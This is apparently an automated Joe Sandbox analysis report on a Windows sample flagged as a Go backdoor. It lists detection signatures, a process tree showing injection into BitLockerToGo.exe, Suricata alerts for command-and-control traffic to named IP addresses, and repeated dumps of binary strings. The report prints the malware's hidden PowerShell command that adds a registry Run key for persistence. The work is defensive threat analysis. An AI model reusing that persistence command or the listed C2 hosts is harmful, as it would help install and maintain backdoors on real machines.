Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BwqqVoHR71.exe

Overview

General Information

Sample name:BwqqVoHR71.exe
renamed because original name is a hash value
Original sample name:0a21a94198f6157abb36bf55cb43be27.exe
Analysis ID:1537033
MD5:0a21a94198f6157abb36bf55cb43be27
SHA1:9a01b5e8a68be2b49250c730f8c3ecaee3734170
SHA256:53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
Tags:exeuser-abuse_ch
Infos:

Detection

GO Backdoor
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found Tor onion address
Injects a PE file into a foreign processes
Suspicious powershell command line found
Writes to foreign memory regions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • BwqqVoHR71.exe (PID: 8164 cmdline: "C:\Users\user\Desktop\BwqqVoHR71.exe" MD5: 0A21A94198F6157ABB36BF55CB43BE27)
    • BitLockerToGo.exe (PID: 7660 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 5908 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • BitLockerToGo.exe (PID: 3192 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.3158908569.000000000C008000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: BitLockerToGo.exe PID: 7660JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 7660, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }", ProcessId: 5908, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-18T14:10:38.691903+020028555361A Network Trojan was detected192.168.2.1049988109.172.88.3823961TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-18T14:11:07.929703+020028555371A Network Trojan was detected192.168.2.1049988109.172.88.3823961TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-18T14:11:08.196218+020028555381A Network Trojan was detected109.172.88.3823961192.168.2.1049988TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-18T14:10:38.691574+020028555391A Network Trojan was detected109.172.88.3823961192.168.2.1049988TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: BwqqVoHR71.exeReversingLabs: Detection: 28%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Source: BwqqVoHR71.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: BwqqVoHR71.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: BitLockerToGo.pdb source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: BitLockerToGo.pdbGCTL source: BwqqVoHR71.exe, 00000000.00000002.1471460076.00000000024BA000.00000004.00001000.00020000.00000000.sdmp

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.88.38:23961 -> 192.168.2.10:49988
      Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.10:49988 -> 109.172.88.38:23961
      Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.10:49988 -> 109.172.88.38:23961
      Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.88.38:23961 -> 192.168.2.10:49988
      Source: global trafficTCP traffic: 109.172.88.38 ports 23961,1,2,3,6,9
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000003B34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004323000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000003508000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BwqqVoHR71.exe, 00000000.00000002.1471460076.0000000004906000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: BitLockerToGo.exe, 00000002.00000002.3157476707.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocalntohs1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfighiddenStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangupGetACPsendto390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefusedabortedCopySidFreeSidSleepExWSARecvWSASendsignal 19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocache
      Source: global trafficTCP traffic: 192.168.2.10:49988 -> 109.172.88.38:23961
      Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
      Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
      Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
